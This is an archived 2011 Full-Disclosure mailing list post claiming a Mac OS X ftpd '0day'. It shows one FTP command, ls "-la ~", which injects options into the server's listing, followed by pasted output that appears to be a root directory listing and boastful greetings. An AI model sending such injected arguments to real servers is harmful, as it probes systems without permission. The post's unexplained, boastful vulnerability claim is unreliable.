lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-Id: <20110212162528.CDE0610E2BB@smtp.hushmail.com>
Date: Sat, 12 Feb 2011 16:25:28 +0000
From: murderingbugs@...h.ai
To: full-disclosure@...ts.grok.org.uk
Subject: Mac OS X ftpd 0day

I was having a fuzzin' session today, stumbled across this little 
bug.


big up 2k11, team karlkani droppin bugs like c4rl3ss k4rl

ftp> ls "-la ~"
227 Entering Passive Mode (**CENSORED)
150 Opening ASCII mode data connection for directory listing.
total 20011
drwxrwxr-t  34 0    80             1258 Aug 12 13:21 .
drwxrwxr-t  34 0    80             1258 Aug 12 13:21 ..
drwxrwxr-x  35 0    80             1190 May 11  2009 Applications
-rw-r--r--   1 0    80            29184 Dec 23  2006 Desktop DB
-rw-r--r--   1 0    80           194178 Dec 23  2006 Desktop DF
drwxrwxr-x   3 0    80              102 May 11  2009 Developer
drwxrwxr-x   2 501  80               68 Jul 17  2010 Groups
drwxrwxr-t  53 0    80             1802 Nov 30  2006 Library
drwxr-xr-x   1 0    0               512 Feb 11 11:54 Network
drwxrwxr-x   6 501  80              204 Nov 30  2006 Shared Items
drwxr-xr-x   4 0    0               136 May 11  2009 System
drwxrwxr-t   6 0    80              204 Nov 30  2006 Users
drwxrwxrwt   6 0    80              204 Dec 30 17:55 Volumes
drwxr-xr-x   4 0    80              136 Jun  8  2005 automount
drwxr-xr-x  48 0    0              1632 May 11  2009 bin
drwxr-xr-x  43 0    501            1462 Jun 28  2006 bru
drwxrwxr-t   2 0    80               68 Dec  8  2003 cores
dr-xr-xr-x   2 0    0               512 Dec 11 13:37 dev
lrwxr-xr-x   1 0    4294967294       11 Nov 30  2006 etc -> 
private/etc
lrwxr-xr-x   1 0    80                9 DDec 11 13:35 mach -> ???
-r--r--r--   1 0    80           624040 Dec 30 17:55 mach.sym
-rw-r--r--   1 0    0           8570484 Oct 10  2007 mach_kernel
drwxr-xr-x   3 0    0               102 Nov  4  2007 opt
drwxr-xr-x   6 0    0               204 Dec 11 13:35 private
drwxr-xr-x  64 0    0              2176 May 11  2009 sbin
lrwxr-xr-x   1 0    4294967294       11 Nov 30  2009 tmp -> 
private/tmp
drwxr-xr-x  10 0    0               340 May 30  2009 usr
lrwxr-xr-x   1 0    4294967294       14 Nov 30  2009 var -> 
private/var
226 Transfer complete.


Play with this how you like.

gre3tz 2 ma boys carnal0wnage, 0xcharlie, dan kaminsky, we like 
y0u, y0u kill crappy bugs, we kill good bug! we > you!, taviso, 
lcamtuf, ben hawkes, everyone at the google security teletubby team

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ